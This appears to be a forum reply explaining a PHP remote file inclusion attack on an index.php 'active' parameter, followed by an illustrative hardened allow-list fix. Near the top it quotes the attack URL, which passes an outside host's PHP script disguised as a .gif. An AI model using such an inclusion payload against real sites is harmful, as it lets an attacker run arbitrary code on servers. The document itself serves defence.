> >>What someone was doing was running the following URLs on one of the server's
> >>sites:
> >>http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
So what you need to do is look at index.php and see what it's doing
with the "active" parameter. Like others have said, it's blindly
pulling in the file that is passed to it and "executing" it (including
it into the PHP code being run). The hacker is being clever and
naming the PHP script with a .gif file type to make it look innocent,
but index.php doesn't care about that.
Once index.php gets the 'active' parameter value, there should be a
bunch of cleansing and validating of the data being passed in before
doing anything else with it. Always assume that every value being
passed in is the most heinous evil attack script imaginable, so you
want to take extra care to sanitize it before touching or using it to
redisplay via a web page or execute as code, etc.
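As an added illustration (not code from the thread or from the affected site), here is the pattern being described in a hypothetical index.php: the unsafe include of a request parameter, followed by one way to fix it by mapping the "active" value onto an allow-list of local files instead of ever treating the raw value as a path.

```php
<?php
// Hypothetical index.php for illustration only.

// --- The pattern described in the thread (do not use) ---
// include($_GET['active']);
// If allow_url_include is on, a value such as
// http://www.someotherdomain.com/filename.gif is fetched over HTTP and
// its contents are executed as PHP; the ".gif" name is irrelevant to include().

// --- Hardened form: the request value selects a key, never a path ---
const PAGE_MAP = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(?string $active): string
{
    // Accept only an exact allow-list key. URLs, absolute paths, "../"
    // sequences, and anything else fall through to the default page.
    if ($active === null || !array_key_exists($active, PAGE_MAP)) {
        if ($active !== null) {
            // Rejected values are worth logging: they are a cheap signal
            // that someone is probing the parameter.
            error_log('index.php: rejected active=' . substr($active, 0, 200));
        }
        return PAGE_MAP['home'];
    }
    return PAGE_MAP[$active];
}

$page = resolve_page($_GET['active'] ?? null);
// The included path is always one of the constants above, rooted at this script.
include __DIR__ . '/' . $page;
```

Disabling allow_url_include in php.ini is a worthwhile backstop, but the allow-list is what actually removes the bug, since a local-file include of uploaded content has the same effect.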